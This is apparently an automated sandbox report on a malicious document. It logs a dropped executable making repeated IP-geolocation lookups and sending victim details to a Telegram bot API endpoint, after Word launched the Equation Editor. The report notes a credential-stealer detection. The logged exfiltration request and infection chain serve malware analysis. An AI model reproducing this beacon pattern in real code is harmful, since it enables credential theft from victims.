                                                                                                                                  2024-11-19 17:08:12 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                  Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  2192.168.2.2249166188.114.97.34433860C:\Users\user\AppData\Roaming\wealthcharliebgk.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-11-19 17:08:14 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-11-19 17:08:14 UTC846INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:14 GMT
                                                                                                                                  Content-Type: text/xml
                                                                                                                                  Content-Length: 361
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                  Age: 3
                                                                                                                                  Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FqitHzy6i78t%2FEY9pl2Bl2eqb1WnVbQ59jZRISgIDcOfYwQlMC1WKwaXp2kEt4gYCU16LasTrKIbwGs3Omx6gdxUHWztkcAROcH4I6%2FzbLc3r2WnAn09Czz%2FxDIHJunvcJLUj4eP"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8e51cd182ca04327-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1623&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1649717&cwnd=245&unsent_bytes=0&cid=8d72017e43bd27e8&ts=165&x=0"
                                                                                                                                  2024-11-19 17:08:14 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                  Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  3192.168.2.2249168188.114.97.34433860C:\Users\user\AppData\Roaming\wealthcharliebgk.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-11-19 17:08:15 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-11-19 17:08:16 UTC846INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:16 GMT
                                                                                                                                  Content-Type: text/xml
                                                                                                                                  Content-Length: 361
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                  Age: 5
                                                                                                                                  Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rlHlK5VJ37OnFinX7l7n1q41oR2oj8YboUBlwSFoq%2Figv4e2X5RW1eJpFk0TD4DurIQmMR6H%2BtYxOsl7mFtNwECHhkaOj%2FrslZfEps29MdnFDwrpZS8ogqkF92KnZ6H4pJ2JWpUl"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8e51cd204ecc42f2-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1870&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1678160&cwnd=211&unsent_bytes=0&cid=864dcac4fb29406c&ts=154&x=0"
                                                                                                                                  2024-11-19 17:08:16 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                  Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  4192.168.2.2249170188.114.96.34433860C:\Users\user\AppData\Roaming\wealthcharliebgk.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-11-19 17:08:18 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-11-19 17:08:18 UTC850INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:18 GMT
                                                                                                                                  Content-Type: text/xml
                                                                                                                                  Content-Length: 361
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                  Age: 7
                                                                                                                                  Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=URj%2F4IgzCjtRUt7q%2Bi6rGgq17qjK%2BhCtjBbz0xa2XToLugV%2Bfkdi6VNwFv5QrA9wXuwhNGxWmsPplXmK5IpG5GpceujCbfzarvlJOiDy36PfhEBmE9Uoo%2Ff8TVIFg82DUQgVxgmI"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8e51cd2ee8557d00-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1845&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=698&delivery_rate=1527995&cwnd=241&unsent_bytes=0&cid=5bfd5d9f819817f1&ts=161&x=0"
                                                                                                                                  2024-11-19 17:08:18 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                  Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  5192.168.2.2249172188.114.96.34433860C:\Users\user\AppData\Roaming\wealthcharliebgk.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-11-19 17:08:19 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-11-19 17:08:20 UTC848INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:20 GMT
                                                                                                                                  Content-Type: text/xml
                                                                                                                                  Content-Length: 361
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                  Age: 9
                                                                                                                                  Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Mp1oMJ3mgnaUQFY4JCCfVVXBHeo6rb82kzRuDDnnJ8Dvb6LJwHHrkye9YQl%2B2xmDEvZyzjQcuWTanBW8gxgyog9j10%2FSbykQu28qL7Gn8T%2FWy%2F8dJwxNQBfmHynVcn4IrQ0Ygeac"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8e51cd395abf8cb1-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1875&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1582655&cwnd=185&unsent_bytes=0&cid=b9939bbb12f1a74d&ts=149&x=0"
                                                                                                                                  2024-11-19 17:08:20 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                  Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  6192.168.2.2249174188.114.96.34433860C:\Users\user\AppData\Roaming\wealthcharliebgk.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-11-19 17:08:21 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-11-19 17:08:21 UTC849INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:21 GMT
                                                                                                                                  Content-Type: text/xml
                                                                                                                                  Content-Length: 361
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                  Age: 10
                                                                                                                                  Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KbGdG7LJv9TvksPuzL%2BH8qTZttOiI7x8oxYYA%2BiuM0cSKE5d0HyPMHd0fsPeMcHW77O4lRO6y0uyUA8MsTio%2BejJtQ0CcZwGKSrmsS9BGFHvgau6MRG%2F1iuEpyHJcQfZqUiCAA1L"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8e51cd409a020fa7-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1654&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=698&delivery_rate=1688837&cwnd=238&unsent_bytes=0&cid=f1ac1f60ef3d2114&ts=165&x=0"
                                                                                                                                  2024-11-19 17:08:21 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                  Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  7192.168.2.2249176188.114.96.34433860C:\Users\user\AppData\Roaming\wealthcharliebgk.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-11-19 17:08:22 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-11-19 17:08:22 UTC845INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:22 GMT
                                                                                                                                  Content-Type: text/xml
                                                                                                                                  Content-Length: 361
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                  Age: 11
                                                                                                                                  Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=62zh%2FsG%2B6itwvatrOGA4RPMgbjpduXZofK0csM2dehJ41mDfRh3lQyLLMAPjUjHNKu0cbzgW1qZpgoi8gQwS9Hdst69YsXt6Dq4WiepTA56BOSflOZWWSpeFIh9zbmLEuKntTESJ"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8e51cd47ec51184d-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2085&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1343146&cwnd=236&unsent_bytes=0&cid=6e558a732ba4a4c2&ts=177&x=0"
                                                                                                                                  2024-11-19 17:08:22 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                  Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  8192.168.2.2249178188.114.96.34433860C:\Users\user\AppData\Roaming\wealthcharliebgk.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-11-19 17:08:23 UTC84OUTGET /xml/8.46.123.75 HTTP/1.1
                                                                                                                                  Host: reallyfreegeoip.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-11-19 17:08:23 UTC847INHTTP/1.1 200 OK
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:23 GMT
                                                                                                                                  Content-Type: text/xml
                                                                                                                                  Content-Length: 361
                                                                                                                                  Connection: close
                                                                                                                                  Cache-Control: max-age=31536000
                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                  Age: 12
                                                                                                                                  Last-Modified: Tue, 19 Nov 2024 17:08:11 GMT
                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Qg9yDY54aoisIDPpmhz14I07E1cUCl5yNbeTEoF%2BkHNAMpm1I71frnvTy5SvXwcyfygCtnrTjYQTa4fEOpFedu2Wf%2Bjdh8KshI2Bdssmw17FhgrL508%2FkGdwjarmfiCqcQ7KpkUD"}],"group":"cf-nel","max_age":604800}
                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                  Server: cloudflare
                                                                                                                                  CF-RAY: 8e51cd4f5ed11869-EWR
                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1519&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=698&delivery_rate=1853968&cwnd=250&unsent_bytes=0&cid=e4a537398e5e67e8&ts=181&x=0"
                                                                                                                                  2024-11-19 17:08:23 UTC361INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 37 35 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f 6e
                                                                                                                                  Data Ascii: <Response><IP>8.46.123.75</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZon


                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                  9192.168.2.2249179149.154.167.2204433860C:\Users\user\AppData\Roaming\wealthcharliebgk.exe
                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                  2024-11-19 17:08:24 UTC353OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:878411%0D%0ADate%20and%20Time:%2011/20/2024%20/%201:09:14%20AM%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20878411%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                                                  Host: api.telegram.org
                                                                                                                                  Connection: Keep-Alive
                                                                                                                                  2024-11-19 17:08:24 UTC344INHTTP/1.1 404 Not Found
                                                                                                                                  Server: nginx/1.18.0
                                                                                                                                  Date: Tue, 19 Nov 2024 17:08:24 GMT
                                                                                                                                  Content-Type: application/json
                                                                                                                                  Content-Length: 55
                                                                                                                                  Connection: close
                                                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                                                                  2024-11-19 17:08:24 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                                                                  Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                                                                  Statistics

                                                                                                                                  CPU Usage

                                                                                                                                  Click to jump to process

                                                                                                                                  Memory Usage

                                                                                                                                  Click to jump to process

                                                                                                                                  High Level Behavior Distribution

                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                  Behavior

                                                                                                                                  Click to jump to process

                                                                                                                                  System Behavior

                                                                                                                                  General

                                                                                                                                  Target ID:0
                                                                                                                                  Start time:12:07:59
                                                                                                                                  Start date:19/11/2024
                                                                                                                                  Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                  Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                                                                                                  Imagebase:0x13fb50000
                                                                                                                                  File size:1'423'704 bytes
                                                                                                                                  MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:false

                                                                                                                                  General

                                                                                                                                  Target ID:2
                                                                                                                                  Start time:12:08:00
                                                                                                                                  Start date:19/11/2024
                                                                                                                                  Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                                                                                  Imagebase:0x400000
                                                                                                                                  File size:543'304 bytes
                                                                                                                                  MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Reputation:high
                                                                                                                                  Has exited:true

                                                                                                                                  General

                                                                                                                                  Target ID:5
                                                                                                                                  Start time:12:08:04
                                                                                                                                  Start date:19/11/2024
                                                                                                                                  Path:C:\Users\user\AppData\Roaming\wealthcharliebgk.exe
                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                  Commandline:"C:\Users\user\AppData\Roaming\wealthcharliebgk.exe"
                                                                                                                                  Imagebase:0xf10000
                                                                                                                                  File size:837'120 bytes
                                                                                                                                  MD5 hash:9D980CAD65D26D5E36BD306044B26AC9
                                                                                                                                  Has elevated privileges:true
                                                                                                                                  Has administrator privileges:true
                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                  Yara matches:
                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.371856792.00000000033F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
